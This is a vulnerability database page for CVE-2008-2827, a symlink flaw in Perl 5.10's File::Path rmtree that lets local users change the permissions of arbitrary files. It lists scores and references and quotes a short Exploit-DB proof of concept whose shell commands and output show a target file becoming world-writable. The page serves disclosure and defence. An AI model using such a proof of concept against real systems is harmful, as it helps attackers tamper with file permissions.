CVE-2008-2827 : Detail

CVE-2008-2827

A01-Broken Access Control
0.04%V3
Local
2008-06-23
17h00 +00:00
2017-08-07
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The rmtree function in lib/File/Path.pm in Perl 5.10 does not properly check permissions before performing a chmod, which allows local users to modify the permissions of arbitrary files via a symlink attack, a different vulnerability than CVE-2005-0448 and CVE-2004-0452.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 31959

Publication date : 2008-06-22 22h00 +00:00
Author : Frans Pop
EDB Verified : Yes

source: https://www.securityfocus.com/bid/29902/info Computers running Perl are prone to a local vulnerability that occurs when handling symbolic links. Attackers can leverage this issue to change the permissions of arbitrary files. Perl 5.10.0 is vulnerable; other versions may also be affected. % touch foo % ln -s foo bar % ls -l foo bar lrwxrwxrwx 1 example example 3 2008-06-21 09:06 bar -> foo -rw-r--r-- 1 example example 0 2008-06-21 09:06 foo % perl -e 'use File::Path rmtree; rmtree bar' % ls -l foo bar ls: cannot access bar: No such file or directory -rwxrwxrwx 1 example example 0 2008-06-21 09:06 foo

Products Mentioned

Configuraton 0

Perl>>Perl >> Version 5.10

References

http://www.securityfocus.com/bid/29902
Tags : vdb-entry, x_refsource_BID
http://www.mandriva.com/security/advisories?name=MDVSA-2008:165
Tags : vendor-advisory, x_refsource_MANDRIVA
http://secunia.com/advisories/31687
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securitytracker.com/id?1020373
Tags : vdb-entry, x_refsource_SECTRACK
http://secunia.com/advisories/30790
Tags : third-party-advisory, x_refsource_SECUNIA
http://secunia.com/advisories/30837
Tags : third-party-advisory, x_refsource_SECUNIA